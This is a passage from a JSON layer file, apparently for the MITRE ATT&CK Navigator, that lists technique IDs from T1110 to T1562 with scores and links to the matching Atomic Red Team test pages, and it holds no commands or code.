1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":